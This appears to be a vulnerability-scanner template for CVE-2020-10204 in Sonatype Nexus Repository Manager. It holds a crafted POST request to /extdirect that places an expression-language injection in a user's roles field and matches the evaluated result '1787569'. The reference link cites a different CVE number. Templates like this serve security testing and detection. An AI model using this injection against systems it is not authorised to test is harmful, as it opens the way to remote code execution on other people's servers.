id: cve-2020-10204

info:
  name: Sonatype Nexus Repository RCE
  auhtor: hetroublemakr
  severity: high
  description: A Remote Code Execution vulnerability has been discovered in Nexus Repository Manager requiring immediate action. The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM
  # reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31

requests:
  - method: POST
    path:
      - '{{BaseURL}}/extdirect'

    body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "1787569"
        part: body
      - type: status
        status:
          - 200